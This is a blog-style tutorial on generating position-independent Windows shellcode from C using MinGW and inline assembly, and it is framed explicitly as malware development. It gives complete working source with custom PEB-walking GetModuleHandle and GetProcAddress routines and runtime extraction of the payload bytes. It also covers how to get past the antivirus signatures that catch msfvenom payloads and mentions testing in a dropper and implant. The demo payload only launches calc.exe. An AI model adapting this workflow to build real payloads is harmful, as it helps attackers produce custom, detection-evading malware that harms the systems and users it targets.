From C, with inline assembly, to shellcode

Friday, August 11, 2023

Part One: Introduction

One of the most important concepts in malware development is position-independent code (PIC). PIC, often referred to interchangeably as shellcode, is a set of assembly instructions that can execute without being loaded by Windows as a complete executable. You’re probably most familiar with shellcode generated by msfvenom that looks something like the screenshot below.

However, msfvenom payloads are so heavily signatured that antivirus products detect them in pretty much any environment, which severely limits the value of being able to generate them quickly.

There are a few ways to generate custom shellcode. The most common is to write it in raw assembly, which makes development technically demanding but gives very granular control over the shellcode’s behavior. This has been done for a very long time, so there are many good examples online of how to get started.

Alternatively, shellcode can be carefully crafted in C to provide a simpler interface for developers, as discussed in mattifestation’s original writeup linked at the bottom of this article. This method requires fairly extensive customization of compiler and linker options, and it offers less control over the output shellcode.

In 2021, hasherezade developed a method that combines the two approaches above. Through some intermediate manipulations, the MSVC compiler can be used to generate shellcode from C in a process reminiscent of mattifestation’s method but with increased control. The downside is that shellcode extraction relies on a third-party tool or script. Additionally, the shellcode this method produces is fairly large, almost 2 KB in my testing.

In this writeup, we’ll demonstrate a novel method of shellcode development that’s similar to hasherezade’s. Instead of using MSVC, we’ll use MinGW to compile some position-independent C code with optimizations and extract our shellcode at runtime. Our method differs from existing ones in that the compiler options are very simple and the output shellcode is comparable in size to shellcode generated by msfvenom.

Part Two: Getting Started

The first thing we need to understand to get working shellcode is that the code we develop cannot reference any WinAPI functions, at least not at first. In a typical C/C++ implementation, you would see something like this:

PVOID pWinExec = GetProcAddress(GetModuleHandle("kernel32"), "WinExec");

Thankfully, there’s a pretty robust set of public research available on implementing custom versions of GetProcAddress and GetModuleHandle. But it’s important that when we implement these in our code, we tell the compiler to inline them as much as possible. Inlining matters because it keeps all of our shellcode in a single contiguous block, rather than spread across several separate functions.

Your custom GetProcAddress and GetModuleHandle should look something like this (the full implementations appear in Part Four):

There’s one more code snippet that’s worth talking about at this point. Inside of our custom GetModuleHandle, there’s a call to “mem_cmp”, which is a custom implementation of the C runtime (CRT) function “memcmp”. We use it in lieu of “strcmp” or “memcmp” so that our code doesn’t depend on the CRT and can retain position independence.

This is the implementation that I used:

Once again, note the “inline” attributes in the declaration.

Part Three: Diving In

Now that we’ve created the necessary code snippets, let's talk about what the primary code logic ought to look like.

Line 8 contains the typedef of WinExec, which we’ll be using to execute calc.exe.

Lines 10-12 contain the function prototypes for the function we wrote in the previous section.

Lines 16-17 have pvStart/EndAddress which we’ll be using later to extract our shellcode.

Line 19 is an inline assembly label “StartAddress” which we can later use to get the starting address of our shellcode. Lines 22-24 align the stack and allocate stack space. As in previous C-to-shellcode methods, this is a necessary step to give our shellcode stack space for its variables.

Lines 27-31 are our local variables that store the strings we’ll need to find WinExec and pop calc.

Line 34 creates the function pointer to WinExec.

Line 35 calls WinExec with our calc.exe argument.

Conventional approaches to shellcode development in C would stop somewhere around here. But by using inline assembly, we can take our shellcode development a step further and extract our shellcode at run time. Let us look at one way to do that.

Line 38 releases the stack space that was allocated on line 24.

Line 39 creates an inline assembly label “EndAddress” that marks the end of our shellcode block.

Lines 41-43 extract the start address of our shellcode and store it in the pvStartAddress variable.

Lines 45-47 extract the end address of our shellcode and store it in the pvEndAddress variable.

Lines 52-61 print the contents of our program between pvStartAddress and pvEndAddress.

If we compile our program without any optimizations, we’ll see the following:

At first glance it looks like it worked, but there are a couple of things that don’t add up. Firstly, this payload is huge. Our second hint that something is wrong is that our payload fails if we test it inside a standard dropper template.

If we run implant.exe, with our custom shellcode embedded, inside a debugger, we see that there’s a call to memcpy (placed by the compiler) inside of what’s supposed to be our position-independent code!

We can fix this issue by compiling our code with the -O option. Now if we execute our program we’ll see the following:

Part Four: The Code


// main.c
// x86_64-w64-mingw32-gcc main.c -O -masm=intel -o msg_shellcode.exe -Wno-int-conversion

#include <windows.h>
#include <stdio.h>
#include "Structs.h" // Extract necessary structures from https://github.com/mrexodia/phnt-single-header

typedef UINT(WINAPI *WinExec_t)(LPCSTR lpCmdLine, UINT uCmdShow);

INT mem_cmp (CONST VOID* str1, CONST VOID* str2, SIZE_T n);
HANDLE LocalGetModuleHandle (CONST CHAR* sModuleName);
PVOID LocalGetProcAddress(HANDLE pBase, CONST CHAR* sFuncName);

INT main(){
	
	PVOID pvStartAddress = NULL;
	PVOID pvEndAddress = NULL;
	
        __asm("StartAddress:;");
	
	//Align the stack
	__asm("and rsp, 0xfffffffffffffff0;"
		  "mov rbp, rsp;"
		  "sub rsp, 0x200" // allocate stack space, arbitrary size...depends on payload
	);
	
	CHAR sKernel32[] = "KERNEL32\0";

	CHAR sWinExec[] = "WinExec\0";
	
	CHAR sCalcExe[] = "calc.exe\0";
	
    
	WinExec_t pWinExec = (WinExec_t) LocalGetProcAddress(LocalGetModuleHandle(sKernel32), sWinExec);
	pWinExec(sCalcExe, 0);
	
	__asm("add rsp, 0x200;"); // Cleanup stack
	__asm("EndAddress:;");
	
	// Extract the shellcode boundaries and print the shellcode
	
	__asm("lea %0, [rip+StartAddress];"
	:"=r"(pvStartAddress)
	);
	
	__asm("lea %0, [rip+EndAddress];"
	:"=r"(pvEndAddress)
	);

	printf("Start address: %p\n", pvStartAddress);
	printf("End address: %p\n", pvEndAddress);
	
    CONST UCHAR* pStart = (CONST UCHAR*)pvStartAddress;
    CONST UCHAR* pEnd = (CONST UCHAR*)pvEndAddress;

	printf("UCHAR payload[] = {");
    while (pStart < (pEnd-1)) {
        printf("0x%02x,", *pStart);
        pStart++;
    }
	printf("0x%02x", *pStart);
	printf("};\n");

	
    return 0;
}

inline __attribute__((always_inline)) HANDLE LocalGetModuleHandle (CONST CHAR* sModuleName) {
	
	PPEB pPeb = NULL;
	HANDLE pBase = NULL;
	
	// PEB
    __asm("mov %0, gs:[0x60];"
    :"=r"(pPeb)
    );

    // Getting the Ldr
    PPEB_LDR_DATA pLdr = (PPEB_LDR_DATA)(pPeb->Ldr);
	
	// Getting the first element in the linked list which contains information about the first module
	PLDR_DATA_TABLE_ENTRY	pDte	= (PLDR_DATA_TABLE_ENTRY)(pLdr->InMemoryOrderModuleList.Flink);
	
	while (pDte) {    
		// If not null
		if (pDte->FullDllName.Length != (USHORT) 0x0) {

			// Check if both equal
			if (mem_cmp(pDte->FullDllName.Buffer, sModuleName, 0x1) == 0) {
				
				// Found sModuleName
				pBase = (HMODULE)(pDte->InInitializationOrderLinks.Flink);
				
				return pBase;
				

			}

		} else {
			break;
		}
		
		// Next element in the linked list
		pDte = *(PLDR_DATA_TABLE_ENTRY*)(pDte);

	}
	
	return NULL;
}

inline __attribute__((always_inline)) PVOID LocalGetProcAddress(HANDLE pBase, CONST CHAR* sFuncName){
	
	// Getting the DOS header (note: no signature check is performed here)
	PIMAGE_DOS_HEADER	pImgDosHdr		= (PIMAGE_DOS_HEADER)pBase;

	// Getting the NT headers (note: no signature check is performed here)
	PIMAGE_NT_HEADERS	pImgNtHdrs		= (PIMAGE_NT_HEADERS)(pBase + pImgDosHdr->e_lfanew);

	// Getting the optional header
	IMAGE_OPTIONAL_HEADER	ImgOptHdr	= pImgNtHdrs->OptionalHeader;

	// Getting the image export table
	PIMAGE_EXPORT_DIRECTORY pImgExportDir = (PIMAGE_EXPORT_DIRECTORY) (pBase + ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

	// Getting the function's names array pointer
	PDWORD FunctionNameArray = (PDWORD)(pBase + pImgExportDir->AddressOfNames);

	// Getting the function's addresses array pointer
	PDWORD FunctionAddressArray = (PDWORD)(pBase + pImgExportDir->AddressOfFunctions);

	// Getting the function's ordinal array pointer
	PWORD  FunctionOrdinalArray = (PWORD)(pBase + pImgExportDir->AddressOfNameOrdinals);


	// Looping through all the exported functions
	for (DWORD i = 0; i < pImgExportDir->NumberOfFunctions; i++){

		// Getting the name of the function
		CHAR* pFunctionName = (CHAR*)(pBase + FunctionNameArray[i]);

		// Getting the address of the function through its ordinal
		PVOID pFunctionAddress	= (PVOID)(pBase + FunctionAddressArray[FunctionOrdinalArray[i]]);

		// Searching for the function specified
		if (mem_cmp(sFuncName, pFunctionName, 0x7) == 0){
			return pFunctionAddress;
		}
	}
	
	return NULL;
	
}

inline __attribute__((always_inline)) INT mem_cmp (CONST VOID* str1, CONST VOID* str2, SIZE_T n) {
    CONST UCHAR* s1 = (CONST UCHAR*)str1;
    CONST UCHAR* s2 = (CONST UCHAR*)str2;

    while (n--)
    {
        if (*s1 != *s2)
            return *s1 - *s2;
        s1++;
        s2++;
    }
    return 0;
}

Part Five: The Results

We can test our code above by putting our shellcode in a generic dropper template.

Note that our shellcode is only 286 bytes in size, compared to the 276-byte msfvenom payload that we saw at the beginning of this article.

Part Six: Conclusion

In this writeup, we discussed a methodology to generate shellcode in a streamlined manner without over-complicated compiler options. The method we discussed relies on using MinGW, custom GetProcAddress and GetModuleHandle implementations, and a few optimizations to generate our shellcode. It’s important to note that this method relies on using the “-O” or “-O1” options in MinGW. Other optimization levels apply transformations that break our shellcode’s position independence in favor of other optimization goals in the output .exe.

This method provides us with an easy-to-use development workflow for custom shellcode generation. And because we’re using the MinGW compiler, we retain the ability to achieve granular control of our shellcode. With many benefits and only a few drawbacks, this method is my second preferred method of custom shellcode generation (after writing raw assembly ofc).

References

https://vxug.fakedoma.in/papers/VXUG/Exclusive/FromaCprojectthroughassemblytoshellcodeHasherezade.pdf
